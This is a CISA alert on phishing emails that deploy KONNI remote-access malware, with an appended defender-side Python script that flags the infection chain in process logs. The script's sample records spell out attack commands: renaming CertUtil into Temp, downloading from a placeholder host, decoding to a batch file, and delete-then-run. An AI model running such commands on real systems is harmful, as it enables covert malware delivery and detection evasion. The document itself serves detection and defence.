AA20-227A: Phishing Emails Used to Deploy KONNI Malware

Original release date: August 14, 2020

Summary

This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.

The Cybersecurity and Infrastructure Security Agency (CISA) has observed cyber actors using emails containing a Microsoft Word document with malicious Visual Basic for Applications (VBA) macro code to deploy KONNI malware. KONNI is a remote administration tool (RAT) used by malicious cyber actors to steal files, capture keystrokes, take screenshots, and execute arbitrary code on infected hosts.

Technical Details

KONNI malware is often delivered via phishing emails as a Microsoft Word document with malicious VBA macro code (Phishing: Spearphishing Attachment [T1566.001]). The malicious code can change the font color from light grey to black (to trick the user into enabling content), check whether the Windows operating system is a 32-bit or 64-bit version, and construct and execute the command line to download additional files (Command and Scripting Interpreter: Windows Command Shell [T1059.003]).

Once the VBA macro constructs the command line, it uses the certificate database tool CertUtil to download remote files from a given Uniform Resource Locator. It also incorporates a built-in function to decode base64-encoded files. The Command Prompt silently copies certutil.exe into a temp directory and renames it to evade detection. The cyber actor then downloads a text file from a remote resource containing a base64-encoded string that is decoded by CertUtil and saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file from the temp directory and executes the .BAT file.

MITRE ATT&CK Techniques

According to MITRE, KONNI uses the ATT&CK techniques listed in table 1.

Table 1: KONNI ATT&CK techniques

Technique | Use
System Network Configuration Discovery [T1016] | KONNI can collect the Internet Protocol address from the victim's machine.
System Owner/User Discovery [T1033] | KONNI can collect the username from the victim's machine.
Masquerading: Match Legitimate Name or Location [T1036.005] | KONNI creates a shortcut called Anti virus service.lnk in an apparent attempt to masquerade as a legitimate file.
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol [T1048.003] | KONNI has used File Transfer Protocol to exfiltrate reconnaissance data.
Input Capture: Keylogging [T1056.001] | KONNI has the capability to perform keylogging.
Process Discovery [T1057] | KONNI has used tasklist.exe to get a snapshot of the current processes' state of the target machine.
Command and Scripting Interpreter: PowerShell [T1059.001] | KONNI used PowerShell to download and execute a specific 64-bit version of the malware.
Command and Scripting Interpreter: Windows Command Shell [T1059.003] | KONNI has used cmd.exe to execute arbitrary commands on the infected host across different stages of the infection chain.
Indicator Removal on Host: File Deletion [T1070.004] | KONNI can delete files.
Application Layer Protocol: Web Protocols [T1071.001] | KONNI has used Hypertext Transfer Protocol for command and control.
System Information Discovery [T1082] | KONNI can gather the operating system version, architecture information, connected drives, hostname, and computer name from the victim's machine and has used systeminfo.exe to get a snapshot of the current system state of the target machine.
…
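As an added defender-side example, not part of the CISA alert, the following Python scans constructed Sysmon-style process-creation records for the stages described in the Technical Details above: an Office process spawning cmd.exe, certutil.exe copied into a temp directory under another name, the renamed CertUtil downloading and base64-decoding into a .BAT file, and the delete-then-execute cleanup. The pipe-separated record layout, the sample paths and URL, and the rule names are assumptions made for this example.

```python
import re
from typing import Dict, List
# Constructed Sysmon-style process-creation records, not taken from the alert.
# Field layout (assumed): Image|OriginalFileName|ParentImage|CommandLine
TMP = r"C:\Users\u\AppData\Local\Temp"
SAMPLE_LOG = "\n".join([
    rf"C:\Windows\System32\cmd.exe|Cmd.Exe|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|cmd /c copy /y C:\Windows\System32\certutil.exe {TMP}\wct.exe",
    rf"{TMP}\wct.exe|CertUtil.exe|C:\Windows\System32\cmd.exe|wct.exe -urlcache -split -f http://example.invalid/p.txt {TMP}\p.txt",
    rf"{TMP}\wct.exe|CertUtil.exe|C:\Windows\System32\cmd.exe|wct.exe -decode {TMP}\p.txt {TMP}\p.bat",
    rf"C:\Windows\System32\cmd.exe|Cmd.Exe|C:\Windows\System32\cmd.exe|cmd /c del {TMP}\p.txt & {TMP}\p.bat",
    r"C:\Windows\System32\certutil.exe|CertUtil.exe|C:\Windows\System32\cmd.exe|certutil -verify C:\certs\corp.cer",
])
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}

def base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()  # lower-cased file name of a Windows path

def scan(log_text: str) -> List[Dict[str, object]]:
    """One finding per (record, rule) hit for the stages described in the alert."""
    findings: List[Dict[str, object]] = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if line.count("|") < 3:
            continue  # malformed record
        image, orig, parent, cmd = line.split("|", 3)
        lc, is_certutil = cmd.lower(), orig.lower() == "certutil.exe"
        rules = []
        # Macro stage: an Office process spawns cmd.exe to build the command line.
        if base(parent) in OFFICE and base(image) == "cmd.exe":
            rules.append("office_spawned_cmd")
        # certutil.exe copied into a temp directory under a new name.
        if re.search(r"\bcopy\b.*certutil\.exe.*\\temp\\", lc):
            rules.append("certutil_copied_to_temp")
        # PE original name is CertUtil.exe, but the image name or location differs.
        if is_certutil and (base(image) != "certutil.exe" or "\\temp\\" in image.lower()):
            rules.append("renamed_certutil")
        # CertUtil fetching a remote file from a URL.
        if is_certutil and "-urlcache" in lc:
            rules.append("certutil_download")
        # CertUtil base64-decoding a text file into a batch file.
        if is_certutil and "-decode" in lc and lc.rstrip().endswith(".bat"):
            rules.append("certutil_decode_to_bat")
        # Cleanup: delete the text file and execute the .BAT in one shell command.
        if re.search(r"\bdel\b.*\.txt.*&.*\.bat", lc):
            rules.append("delete_then_run_bat")
        findings.extend({"line": n, "rule": r, "image": image} for r in rules)
    return findings

def triggered_rules(log_text: str) -> List[str]:
    return sorted({str(f["rule"]) for f in scan(log_text)})  # distinct rule names
```

The benign fifth record (certutil.exe run from System32 to verify a certificate) fires no rule, while the renamed copy in Temp is caught by its PE original file name even though its image name was changed.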
